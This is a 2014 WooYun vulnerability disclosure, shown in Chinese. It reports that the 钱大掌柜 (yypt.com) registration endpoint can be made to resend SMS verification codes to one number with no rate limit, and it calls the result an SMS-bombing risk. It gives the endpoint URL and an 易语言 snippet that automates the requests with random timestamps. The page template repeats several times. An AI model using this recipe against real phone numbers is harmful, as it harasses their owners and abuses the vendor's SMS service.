钱大掌柜利用漏洞可变短信轰炸 | wooyun-2014-053211| WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-053211

漏洞标题：钱大掌柜利用漏洞可变短信轰炸

漏洞作者：陈枫

提交时间：2014-03-13 11:36

修复时间：2014-04-27 11:36

公开时间：2014-04-27 11:36

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：8

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

2014-03-13：积极联系厂商并且等待厂商认领中，细节不对外公开
2014-04-27：厂商已经主动忽略漏洞，细节向公众公开

简要描述：

钱大掌柜可以利用抓随机值重复发送注册认证码短信给同一个号码.而且不受时间限制!
要是被利用做成短信轰炸,估计威力不小啊!

详细说明：

https://www.yypt.com/finance/regist!sendValidateCode.do?0.012081895545985044&mobile=150*******1
https://www.yypt.com/finance/regist!sendValidateCode.do?0.18127401016843408&mobile=150********1
抓的随机值直接get提交!
可做成易语言代码自动发送
代码如下!

https://www.yypt.com/finance/regist!sendValidateCode.do?"+时间_取随机时间戳 ()+"&mobile=

WooYun.org

漏洞概要关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-053211

漏洞标题：钱大掌柜利用漏洞可变短信轰炸

相关厂商：钱大掌柜

漏洞作者：陈枫

提交时间：2014-03-13 11:36

修复时间：2014-04-27 11:36

公开时间：2014-04-27 11:36

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：8

漏洞状态：未联系到厂商或者厂商积极忽略

漏洞来源： http://www.wooyun.org，如有疑问或需要帮助请联系 [email protected]

Tags标签：无

4人收藏收藏
分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源陈枫@乌云

漏洞回应

厂商回应：

WooYun.org

漏洞概要 关注数(24) 关注此漏洞

缺陷编号：wooyun-2014-053211

漏洞标题： 钱大掌柜利用漏洞可变短信轰炸

相关厂商：钱大掌柜

漏洞作者： 陈枫

提交时间：2014-03-13 11:36

修复时间：2014-04-27 11:36

公开时间：2014-04-27 11:36

漏洞类型：设计缺陷/逻辑错误

危害等级：中

自评Rank：8

漏洞状态：未联系到厂商或者厂商积极忽略

Tags标签： 无

4人收藏 收藏 var token=""; var id="wooyun-2014-053211"; $(".btn-fav").click(function(){ CollectBug(id,token); }); 分享漏洞：

漏洞详情

披露状态：

简要描述：

详细说明：

漏洞证明：

修复方案：

版权声明：转载请注明来源 陈枫@乌云

漏洞回应

厂商回应：

漏洞概要关注数(24) 关注此漏洞

漏洞标题：钱大掌柜利用漏洞可变短信轰炸

漏洞作者：陈枫

Tags标签：无

4人收藏收藏
分享漏洞：

版权声明：转载请注明来源陈枫@乌云